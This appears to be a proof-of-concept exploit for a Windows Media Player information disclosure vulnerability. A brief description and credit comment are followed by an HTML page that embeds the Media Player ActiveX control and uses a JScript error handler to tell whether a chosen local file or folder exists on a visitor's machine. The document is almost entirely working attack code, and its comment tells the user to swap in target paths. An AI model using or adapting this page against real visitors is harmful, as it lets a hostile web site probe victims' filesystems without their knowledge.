Windows Media Player in Microsoft Windows 8.1; Windows Server 2012 R2; Windows RT 8.1; Windows 7 SP1; Windows 2008 SP2 and R2 SP1, Windows Server 2016; Windows Vista SP2; and Windows 10 Gold, 1511, and 1607 allows remote attackers to obtain sensitive information via a crafted web site, aka "Windows Media Player Information Disclosure Vulnerability.
<!--
Credit: @qab && @shhnjk
Keep changing param.url to your desired file to detect.
This works on folders as well ( ex: file://C://Windows//con.mp3 )
To see why we are using a reserved windows name 'con.*' remove it and try to 'detect' a file without it.
-->
<OBJECT id="Player" classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6">
<PARAM NAME="URL" VALUE="file://C://Windows//win.ini//con.mp3">
<param name="captioningID" value="displaylyric" />
<PARAM NAME="autoStart" VALUE="-1">
</OBJECT>
<SCRIPT LANGUAGE = "JScript" FOR = Player EVENT = error()>
if(Player.error.item(0).errorDescription.length==189){
alert('File not detected.');
}
else{
alert('File detected!');
}
</SCRIPT>